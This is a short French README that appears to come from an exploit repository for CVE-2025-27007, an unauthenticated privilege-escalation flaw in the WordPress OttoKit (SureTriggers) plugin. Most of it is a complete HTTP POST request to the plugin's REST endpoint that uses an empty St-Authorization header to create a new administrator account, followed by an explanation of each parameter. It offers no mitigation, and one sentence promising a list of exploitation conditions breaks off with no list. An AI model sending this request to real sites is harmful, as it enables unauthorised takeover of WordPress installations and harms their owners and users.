
exploitation de la CVE-2025-27007, une vulnérabilité critique d’élévation de privilèges non authentifiée dans le plugin WordPress OttoKit (anciennement SureTriggers)
L'exploitation de CVE-2025-27007, une vulnérabilité critique d'élévation de privilèges non autorisée dans le plugin OttoKit (anciennement connu sous le nom de SureTriggers) pour WordPress. Ce dépôt explique comment un attaquant peut créer un compte administrateur sur un site WordPress vulnérable.
La vulnérabilité peut être exploitée dans les circonstances suivantes :
La requête suivante cible le point de terminaison /wp-json/sure-triggers/v1/automation/action afin de créer un compte administrateur :
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
Point de terminaison : POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (vide): permet de contourner l'authentification lorsque le plugin n'est pas configuré.
selected_options[user_name]: Nom d'utilisateur du nouveau compte (par exemple, new_admin).
selected_options[user_email]: Adresse e-mail du nouveau compte (par exemple, [email protected]).
selected_options[password]: Mot de passe du nouveau compte (par exemple, StrongP@ssw0rd123).
selected_options[role]: Défini sur administrator pour accorder tous les privilèges.
type_event: Défini sur create_user_if_not_exists pour déclencher la création d'utilisateur.